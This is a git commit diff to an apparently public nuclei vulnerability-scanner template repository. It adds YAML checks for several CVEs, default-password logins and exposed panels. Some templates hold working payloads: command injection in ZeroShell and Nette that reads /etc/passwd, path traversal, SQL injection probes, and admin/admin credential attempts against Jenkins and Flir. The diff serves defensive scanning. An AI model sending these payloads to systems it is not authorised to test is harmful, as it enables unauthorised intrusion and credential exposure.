commit
a45af2f778
|
@ -8,7 +8,6 @@
|
|||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
- "headless"
|
||||
- "dos"
|
||||
- "iot"
|
||||
- "misc"
|
||||
|
|
10
README.md
10
README.md
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
|
||||
| takeovers | 67 | exposures | 99 | technologies | 67 |
|
||||
| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
|
||||
| default-logins | 26 | exposed-tokens | 0 | dns | 8 |
|
||||
| cves | 318 | vulnerabilities | 159 | exposed-panels | 131 |
|
||||
| takeovers | 67 | exposures | 102 | technologies | 75 |
|
||||
| misconfiguration | 63 | workflows | 31 | miscellaneous | 22 |
|
||||
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
|
||||
| fuzzing | 9 | helpers | 8 | iot | 11 |
|
||||
|
||||
**105 directories, 1085 files**.
|
||||
**108 directories, 1120 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-3744
|
||||
|
||||
info:
|
||||
name: Node.js st module Directory Traversal
|
||||
author: geeknik
|
||||
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
|
||||
reference: |
|
||||
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
|
||||
- https://snyk.io/vuln/npm:st:20140206
|
||||
severity: high
|
||||
tags: cve,cve2014,lfi,nodejs,st
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
@ -8,10 +8,7 @@ info:
|
|||
- https://www.exploit-db.com/exploits/47760
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
|
||||
description: |
|
||||
Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
|
||||
it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components
|
||||
Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht
|
||||
Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices
|
||||
A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
|
||||
tags: rce,yachtcontrol,cve,cve2019
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2020-15227
|
||||
|
||||
info:
|
||||
name: Nette Framework RCE
|
||||
author: becivells
|
||||
severity: high
|
||||
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
|
||||
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
|
||||
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
|
||||
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
|
||||
tags: cve,cve2020,nette,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2020-36112
|
||||
|
||||
info:
|
||||
name: CSE Bookstore 1.0 SQL Injection
|
||||
author: geeknik
|
||||
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/49314
|
||||
- https://www.tenable.com/cve/CVE-2020-36112
|
||||
severity: critical
|
||||
tags: cve,cve2020,sqli,cse
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "get book price failed! You have an error in your SQL syntax"
|
||||
- "Can't retrieve data You have an error in your SQL syntax"
|
||||
condition: or
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
|
||||
reference: https://www.tenable.com/security/research/tra-2020-51
|
||||
tags: cve,cve2020,magmi
|
||||
tags: cve,cve2020,magmi,magento
|
||||
|
||||
# Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
|
||||
# in the event that a CSRF is leveraged against an existing admin session for MAGMI.
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
|
||||
reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
|
||||
tags: cve,cve2020,magmi
|
||||
tags: cve,cve2020,magmi,magento
|
||||
|
||||
# Response code 503 indicates a potential successful "Too many connections" error
|
||||
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
|
||||
|
|
|
@ -4,7 +4,20 @@ info:
|
|||
name: ZyXEL NAS RCE
|
||||
author: dhiyaneshDk
|
||||
severity: critical
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054
|
||||
description: |
|
||||
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device.
|
||||
ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it.
|
||||
If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device.
|
||||
Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges.
|
||||
As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges.
|
||||
By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device.
|
||||
This may happen by directly connecting to a device if it is directly exposed to an attacker.
|
||||
However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices.
|
||||
For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system.
|
||||
Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
|
||||
reference: |
|
||||
- https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
|
||||
- https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
|
||||
tags: cve,cve2020,rce
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2020-9490
|
||||
|
||||
info:
|
||||
name: CVE-2020-9490 Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
|
||||
author: philippedelteil
|
||||
name: CVE-2020-9490
|
||||
severity: medium
|
||||
description: Detects apache versions 2.4.43, 2.4.39, 2.4.38, 2.4.37, 2.4.35, 2.4.34, 2.4.33, 2.4.30, 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20 that are POTENTIALLY vulnerable to CVE-2020-9490
|
||||
description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
|
||||
author: philippedelteil
|
||||
tags: cve,cve2020,apache,dos
|
||||
reference: |
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
|
@ -18,22 +18,7 @@ requests:
|
|||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Apache/2.4.20"
|
||||
- "Apache/2.4.23"
|
||||
- "Apache/2.4.25"
|
||||
- "Apache/2.4.26"
|
||||
- "Apache/2.4.27"
|
||||
- "Apache/2.4.28"
|
||||
- "Apache/2.4.29"
|
||||
- "Apache/2.4.30"
|
||||
- "Apache/2.4.33"
|
||||
- "Apache/2.4.34"
|
||||
- "Apache/2.4.35"
|
||||
- "Apache/2.4.37"
|
||||
- "Apache/2.4.38"
|
||||
- "Apache/2.4.39"
|
||||
- "Apache/2.4.43"
|
||||
- type: regex
|
||||
regex:
|
||||
- "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
|
||||
part: header
|
||||
condition: or
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2021-24176
|
||||
|
||||
info:
|
||||
name: WordPress JH 404 Logger XSS
|
||||
author: Ganofins
|
||||
severity: medium
|
||||
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
|
||||
references: |
|
||||
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
|
||||
- https://wordpress.org/plugins/jh-404-logger/
|
||||
tags: cve,cve2021,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "JH 404 Logger"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,57 @@
|
|||
id: CVE-2021-27850
|
||||
|
||||
info:
|
||||
name: Apache Tapestry - Arbitrary class download
|
||||
description: |
|
||||
A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
|
||||
author: pdteam
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
|
||||
tags: cve,cve2021,apache,tapestry
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
- |
|
||||
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
|
||||
internal: true
|
||||
name: id
|
||||
part: header
|
||||
group: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'application/java'
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'configuration'
|
||||
- 'webtools'
|
||||
part: body
|
||||
condition: and
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2021-29622
|
||||
|
||||
info:
|
||||
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
|
||||
author: geeknik
|
||||
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
|
||||
reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
|
||||
severity: medium
|
||||
tags: cve,cve2021,prometheus,redirect
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/new/newhttp://example.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: VoipMonitor Pre-Auth-RCE
|
||||
author: shifacyclewala,hackergautam
|
||||
severity: critical
|
||||
description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
|
||||
description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
|
||||
tags: cve,cve2021,rce,voipmonitor
|
||||
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
|
||||
|
||||
|
|
|
@ -1,23 +0,0 @@
|
|||
id: CVE-2021-31800
|
||||
|
||||
info:
|
||||
name: Impacket directory traversal
|
||||
author: geeknik
|
||||
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
|
||||
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
|
||||
severity: high
|
||||
tags: impacket,cve,cve2021,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: DVWA Default Login
|
||||
author: pdteam
|
||||
severity: critical
|
||||
tags: dvwa,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: flir-default-credentials
|
||||
|
||||
info:
|
||||
name: Flir Default Credentials
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: default-login,flir
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /login/dologin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 35
|
||||
Accept: */*
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Connection: closen
|
||||
|
||||
user_name=admin&user_password=admin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"success"'
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(tolower(all_headers), 'text/html')
|
||||
- contains(tolower(all_headers), 'phpsessid')
|
||||
- contains(tolower(all_headers), 'showcameraid')
|
||||
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,50 @@
|
|||
id: jenkins-weak-password
|
||||
|
||||
info:
|
||||
name: Jenkins Weak Password
|
||||
author: Zandros0
|
||||
severity: high
|
||||
tags: jenkins,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /j_spring_security_check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: {{cookie}}
|
||||
|
||||
j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
|
||||
|
||||
- |
|
||||
POST /j_spring_security_check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: {{cookie}}
|
||||
|
||||
j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: {{cookie}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: cookie
|
||||
internal: true
|
||||
part: header
|
||||
regex:
|
||||
- 'JSESSIONID\..*=([a-z0-9.]+)'
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_4, "/logout")'
|
||||
- 'contains(body_4, "Dashboard [Jenkins]")'
|
||||
condition: and
|
|
@ -22,11 +22,16 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '"code":200'
|
||||
- '"msg"'
|
||||
- '"content"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'application/json'
|
||||
- 'XXL_JOB_LOGIN_IDENTITY'
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: exposed-nomad
|
||||
|
||||
info:
|
||||
name: Exposed Nomad Jobs
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: nomad,devops,hashicorp
|
||||
reference: https://www.nomadproject.io/docs/internals/security
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ui/jobs"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Nomad"
|
||||
- "nomad-ui"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,21 @@
|
|||
id: jenkins-login
|
||||
|
||||
info:
|
||||
name: Jenkins Login
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: panel,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Sign in [Jenkins]'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: magento-admin-panel
|
||||
|
||||
info:
|
||||
name: Exposed Magento Admin Panel
|
||||
author: TechbrunchFR
|
||||
severity: info
|
||||
description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
|
||||
reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "/admin/index/index/key/"
|
||||
part: header
|
|
@ -25,9 +25,6 @@ requests:
|
|||
- "{{BaseURL}}/wp-config.php.bak"
|
||||
- "{{BaseURL}}/wp-login.php.bak"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -3,7 +3,7 @@ info:
|
|||
name: Magento Config Disclosure
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: config,exposure
|
||||
tags: config,exposure,magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -12,6 +12,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.netrc"
|
||||
- "{{BaseURL}}/_netrc"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: ioncube-loader-wizard
|
||||
|
||||
info:
|
||||
name: Ioncube Loader Wizard disclosure
|
||||
author: Mubassirpatel
|
||||
severity: medium
|
||||
description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc.
|
||||
reference: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
|
||||
tags: ioncube,disclosure,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ioncube/loader-wizard.php"
|
||||
- "{{BaseURL}}/loader-wizard.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ionCube Loader Wizard"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: joomla-file-listing
|
||||
|
||||
info:
|
||||
name: Joomla database files listing
|
||||
author: iampritam
|
||||
severity: info
|
||||
reference: https://www.exploit-db.com/ghdb/6377
|
||||
description: Searches for the pattern /libraries/joomla/database/ on passed URLs.
|
||||
tags: exposure,joomla,listing
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/libraries/joomla/database/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Index of /libraries/joomla/database"
|
||||
- "Parent Directory"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -3,31 +3,95 @@ Accept-Charset
|
|||
Accept-Datetime
|
||||
Accept-Encoding
|
||||
Accept-Language
|
||||
Alt-Svc
|
||||
Authorization
|
||||
Base-Url
|
||||
CF-Connecting-IP
|
||||
Cache-Control
|
||||
Client-IP
|
||||
Cluster
|
||||
Cluster-Client-IP
|
||||
Connection
|
||||
Contact
|
||||
Content-Length
|
||||
Content-MD5
|
||||
Content-Type
|
||||
Cookie
|
||||
DNT
|
||||
Date
|
||||
Destination
|
||||
Expect
|
||||
Forwarded
|
||||
From
|
||||
Front-End-Https
|
||||
HTTP_CLIENT_IP
|
||||
HTTP_FORWARDED
|
||||
HTTP_FORWARDED_FOR
|
||||
HTTP_X_FORWARDED
|
||||
HTTP_X_FORWARDED_FOR
|
||||
Host
|
||||
Http-Url
|
||||
If-Match
|
||||
If-Modified-Since
|
||||
If-None-Match
|
||||
If-Range
|
||||
If-Unmodified-Since
|
||||
Link
|
||||
Location
|
||||
Max-Forwards
|
||||
Origin
|
||||
Pragma
|
||||
Profile
|
||||
Proxy
|
||||
Proxy-Authorization
|
||||
Proxy-Connection
|
||||
Proxy-Host
|
||||
Proxy-Url
|
||||
Range
|
||||
Real-Ip
|
||||
Redirect
|
||||
Referer
|
||||
Referrer
|
||||
Refferer
|
||||
Request-Uri
|
||||
TE
|
||||
True-Client-IP
|
||||
UID
|
||||
Upgrade
|
||||
Uri
|
||||
User-Agent
|
||||
Via
|
||||
Warning
|
||||
X-ATT-DeviceId
|
||||
X-Arbitrary
|
||||
X-CSRFToken
|
||||
X-Client-IP
|
||||
X-Cluster-Client-IP
|
||||
X-Correlation-ID
|
||||
X-Csrf-Token
|
||||
X-Do-Not-Track
|
||||
X-Forward-For
|
||||
X-Forwarded
|
||||
X-Forwarded-By
|
||||
X-Forwarded-For
|
||||
X-Forwarded-For-Original
|
||||
X-Forwarded-Host
|
||||
X-Forwarded-Proto
|
||||
X-Forwarded-Server
|
||||
X-Forwarder-For
|
||||
X-Host
|
||||
X-Http-Destinationurl
|
||||
X-Http-Host-Override
|
||||
X-Http-Method-Override
|
||||
X-Original-Remote-Addr
|
||||
X-Original-Url
|
||||
X-Proxy-Url
|
||||
X-ProxyUser-Ip
|
||||
X-Real-Ip
|
||||
X-Remote-Addr
|
||||
X-Request-ID
|
||||
X-Requested-With
|
||||
X-Rewrite-Url
|
||||
X-UIDH
|
||||
X-Wap-Profile
|
||||
X-XSRF-TOKEN
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
id: google-floc-disabled
|
||||
|
||||
info:
|
||||
name: Google FLoC Disabled
|
||||
author: geeknik
|
||||
description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
|
||||
reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
|
||||
severity: info
|
||||
tags: google,floc,misc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "interest-cohort=()"
|
|
@ -0,0 +1,25 @@
|
|||
id: tabnabbing-check
|
||||
|
||||
info:
|
||||
name: Reverse Tabnabbing
|
||||
author: bolli95
|
||||
severity: info
|
||||
tags: misc
|
||||
reference: |
|
||||
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
|
||||
- https://www.youtube.com/watch?v=TMKZCHYmtD4
|
||||
- https://hackerone.com/reports/211065
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
|
||||
- type: dsl
|
||||
dsl:
|
||||
